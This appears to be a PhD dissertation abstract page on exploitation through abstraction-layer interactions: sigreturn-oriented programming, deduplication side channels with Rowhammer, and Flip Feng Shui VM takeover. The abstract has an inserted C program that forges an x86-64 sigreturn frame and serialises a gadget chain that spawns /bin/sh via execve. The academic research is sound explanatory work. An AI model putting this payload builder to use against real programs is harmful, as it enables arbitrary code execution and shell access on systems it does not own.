Abstract
Abstractions are fundamental to software engineering. Modern systems are
simply too complex for any single person to completely keep in their head, and
abstractions are a great way to divide up required functionality into separate
components. This allows for division of labor and simplifies reasoning about
the correctness of parts of the system.
However, hiding implementation details behind an abstraction can also conceal
problems in that implementation. On top of that, confusion about exactly what
functionality an abstraction provides can lead to flaws that attackers can
exploit.
Exploit development is a software engineering discipline in itself, and as
such, also often makes use of abstractions. While an attacker has to work with
the implementations of their target system, they are not restricted to viewing
this system through the same abstractions. Sometimes un(der)specified
behaviors in the implementation of one abstraction, which in isolation seem
innocuous, can interact with other parts of a system to create a new flaw, or
exacerbate an existing one.
This dissertation explores three ways in which unforeseen interactions between
abstraction layers can lead to security vulnerabilities, or make them worse.
First, we explore how the implementation of an obscure corner of the UNIX/Linux
operating system, the mechanism by which a process returns from a signal handler,
enables an exploitation technique called sigreturn-oriented programming. It
turns out that this gives attackers nearly complete control over a program's
execution state, which greatly simplifies writing exploits. In some cases, it even
allows for exploits that work regardless of which version of a vulnerable program
is being exploited.
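The control the abstract refers to comes from the fact that rt_sigreturn reloads every general-purpose register, the instruction pointer and the stack pointer from a frame that sits in user memory, so an attacker who can place bytes on the stack and reach one sigreturn syscall decides the entire register state. The following C program is an added illustration, not code from the dissertation: it lays out that frame with the x86-64 Linux offsets (struct ucontext followed by struct sigcontext as the kernel reads them from the user stack) and serialises the classic chain `pop rax; ret` / 15 / `syscall; ret` / frame. The gadget, `/bin/sh` and stack addresses are hypothetical placeholders; nothing here executes a sigreturn.

```c
/* Added example, not part of the dissertation: building an x86-64 Linux
 * sigreturn frame by hand. Offsets match the kernel's struct ucontext +
 * struct sigcontext layout; all addresses below are hypothetical. */
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SYS_RT_SIGRETURN 15   /* x86-64 syscall numbers */
#define SYS_EXECVE       59
#define USER_CS          0x33 /* 64-bit user code segment selector */
#define USER_SS          0x2b /* user data/stack segment selector */

/* One uint64_t per field keeps natural alignment, so the struct matches the
 * on-stack layout byte for byte (31 fields * 8 = 0xf8 bytes). */
typedef struct {
    uint64_t uc_flags;      /* 0x00 */
    uint64_t uc_link;       /* 0x08 */
    uint64_t ss_sp;         /* 0x10  uc_stack */
    uint64_t ss_flags;      /* 0x18 */
    uint64_t ss_size;       /* 0x20 */
    uint64_t r8;            /* 0x28  start of sigcontext */
    uint64_t r9, r10, r11, r12, r13, r14, r15;
    uint64_t rdi;           /* 0x68  first syscall argument */
    uint64_t rsi, rbp, rbx, rdx;
    uint64_t rax;           /* 0x90  syscall number on landing */
    uint64_t rcx;
    uint64_t rsp;           /* 0xa0  new stack pointer */
    uint64_t rip;           /* 0xa8  where execution resumes */
    uint64_t eflags;        /* 0xb0 */
    uint64_t csgsfs;        /* 0xb8  cs | gs<<16 | fs<<32 | ss<<48 */
    uint64_t err, trapno, oldmask, cr2;
    uint64_t fpstate;       /* 0xe0  NULL: kernel skips FPU state restore */
    uint64_t reserved;      /* 0xe8 */
    uint64_t sigmask;       /* 0xf0 */
} srop_frame_t;

_Static_assert(sizeof(srop_frame_t) == 0xf8, "frame must be 248 bytes");
_Static_assert(offsetof(srop_frame_t, rip) == 0xa8, "rip offset drifted");

/* Frame that, once rt_sigreturn loads it, resumes at a `syscall` gadget with
 * registers set up for execve(binsh, NULL, NULL). Only cs/ss need sane
 * values for the kernel to accept the frame; everything else is ours. */
srop_frame_t srop_execve_frame(uint64_t syscall_gadget, uint64_t binsh,
                               uint64_t new_sp)
{
    srop_frame_t f;
    memset(&f, 0, sizeof f);
    f.rax = SYS_EXECVE;
    f.rdi = binsh;                 /* path */
    f.rsi = 0;                     /* argv */
    f.rdx = 0;                     /* envp */
    f.rip = syscall_gadget;
    f.rsp = new_sp;
    f.csgsfs = USER_CS | ((uint64_t)USER_SS << 48);
    return f;
}

/* Serialise the chain an overwritten return address would run into:
 *   [pop rax; ret][15][syscall; ret][frame]
 * When `syscall` executes with rax = 15, rsp points at the frame, which is
 * exactly where the kernel's rt_sigreturn expects the ucontext.
 * Returns the number of bytes written, or 0 if the buffer is too small. */
size_t srop_payload(uint8_t *out, size_t cap, uint64_t pop_rax_gadget,
                    uint64_t syscall_gadget, const srop_frame_t *frame)
{
    uint64_t chain[3] = { pop_rax_gadget, SYS_RT_SIGRETURN, syscall_gadget };
    size_t need = sizeof chain + sizeof *frame;
    if (cap < need)
        return 0;
    memcpy(out, chain, sizeof chain);
    memcpy(out + sizeof chain, frame, sizeof *frame);
    return need;
}

int main(void)
{
    /* Hypothetical addresses: a syscall gadget, a "/bin/sh" string, a stack. */
    srop_frame_t f = srop_execve_frame(0x401234, 0x404000, 0x7ffd00000000ULL);
    uint8_t buf[512];
    size_t n = srop_payload(buf, sizeof buf, 0x401111, 0x401234, &f);
    printf("payload: %zu bytes, rip=%#" PRIx64 " rsp=%#" PRIx64 " rax=%" PRIu64 "\n",
           n, f.rip, f.rsp, f.rax);
    return 0;
}
```

Two properties of the frame explain why the technique is so convenient: the attacker never needs gadgets that load individual registers, because the kernel performs every load, and the only code required from the target is a way to execute `syscall` with rax set to 15 plus a `syscall` instruction to land on. The kernel does validate the segment selectors, which is why cs and ss are filled in with the user-mode values, and a NULL fpstate pointer is accepted, so no floating-point save area has to be forged.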
Next, we examine the security implications of memory deduplication, a
performance optimization commonly found in both virtualization environments and
operating systems. Our work shows how deduplication can be abused as a
side channel in a more powerful way than was previously known. Furthermore, by
combining this side channel, used to leak data, with a hardware flaw called
Rowhammer, used to cause a corruption chosen with the help of that data, we show
that it is possible to exploit a browser without relying on any flaw in the
browser itself.
Finally, we combine Rowhammer and deduplication in a different way to create a
precise memory corruption primitive, in a technique we call Flip Feng Shui.
Here, deduplication serves to gain control over where an otherwise random memory
corruption lands. This lets us corrupt cryptographic key material and
configuration files, and allows us to take over one virtual machine from another
virtual machine running on the same hardware.
| Original language | English |
|---|---|
| Qualification | PhD |
| Awarding Institution | |
| Supervisors/Advisors | |
| Award date | 19 Nov 2024 |
| Print ISBNs | 9789464736120 |
| DOIs | |
| Publication status | Published - 19 Nov 2024 |
Keywords
- Exploitation
- Weird Machines
- Rowhammer
- Memory Deduplication
- Side-channels
- Sigreturn Oriented Programming